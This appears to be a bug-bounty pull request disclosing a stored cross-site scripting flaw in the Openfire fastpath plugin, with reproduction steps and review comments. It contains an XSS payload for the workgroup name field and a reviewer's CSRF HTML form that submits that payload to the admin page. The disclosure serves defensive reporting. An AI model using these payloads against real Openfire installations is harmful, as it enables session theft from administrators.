### PR TITLE
Cross-Site Scripting (XSS) in openfire-fastpath-plugin

### PR DESCRIPTION
**Pull request by ready-research**
## ✍️ Description

`openfire-fastpath-plugin` is vulnerable to `Cross-Site Scripting (XSS)`.

## 🕵️‍♂️ Proof of Concept

# Steps To Reproduce-:  

1. Download openfire and install https://www.igniterealtime.org/downloads/
2. Run the server http://localhost:9090/index.jsp
3. Click on "Plugins" http://localhost:9090/plugin-admin.jsp and install the "fastpath" plugin.
4. Click on  "fastpath" and "create workgroup" http://localhost:9090/plugins/fastpath/workgroup-create.jsp
5. Insert payload in GWorkgroup Name:  "><ScRiPt>alert('XSS')</ScRiPt> and create workgroup
6. XSS will be triggered.

fastpath
fastpath1

## 💥 Impact

The attacker could trick the user and execute the javascript in his browser session stealing his session information.

## ✅ Checklist

**In my pull request, I have:**

- [x] _Created and populated the `README.md` and `vulnerability.json` files_
- [x] _Provided the repository URL and any applicable [permalinks]([https://help.github.com/en/github/managing-files-in-a-repository/getting-permanent-links-to-files](https://help.github.com/en/github/managing-files-in-a-repository/getting-permanent-links-to-files))_
- [x] _Defined all the applicable weaknesses ([CWEs]([https://cwe.mitre.org/](https://cwe.mitre.org/)))_
- [x] _Proposed the CVSS vector items i.e. User Interaction, Attack Complexity_
- [x] _Checked that the vulnerability affects the latest version of the package released_
- [x] _Checked that a fix does not currently exist that remediates this vulnerability_
- [x] _Complied with all applicable laws_

### CODE REVIEW

**Review by Mik317 — APPROVED** [review]
LGTM :smile: :cake:
CSRF possible too makes it `higher` :+1: 

```html
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localtest.me:9090/plugins/fastpath/workgroup-create.jsp" method="POST">
      <input type="hidden" name="wgName" value="&quot;&gt;&lt;ScRiPt&gt;alert&#40;&apos;XSS&apos;&#41;&lt;&#47;ScRiPt&gt;" />
      <input type="hidden" name="agents" value="" />
      <input type="hidden" name="description" value="" />
      <input type="hidden" name="create" value="Create&#32;Workgroup" />
      <input type="hidden" name="queueName" value="" />
      <input type="hidden" name="maxChats" value="" />
      <input type="hidden" name="minChats" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```

Screenshot from 2020-12-16 09-46-54

Cheers,
Mik

**Comment by Mik317** [comment]
@ready-research please correct the format of the `PR` :smile:

Cheers,
Mik

File: bounties/other/openfire-fastpath-plugin/1/README.md [hunk 1]
```diff
@@ -0,0 +1,17 @@
...
+
+`openfire-fastpath-plugin` is vulnerable to `Cross-Site Scripting (XSS)`.
+
+# Steps To Reproduce
+
+1. Download openfire and install https://www.igniterealtime.org/downloads/
+2. Run the server http://localhost:9090/index.jsp
+3. Click on "Plugins" http://localhost:9090/plugin-admin.jsp and install the "fastpath" plugin.
+4. Click on  "fastpath" and "create workgroup" http://localhost:9090/plugins/fastpath/workgroup-create.jsp
+```
```
Comment (mzfr) [inline bounties/other/openfire-fastpath-plugin/1/README.md:11]: @ready-research Please remove these tilts. Currently, the readme looks like this:

image

Comment (m0hanlal) [reply bounties/other/openfire-fastpath-plugin/1/README.md:11]: updated

**Pull request merged**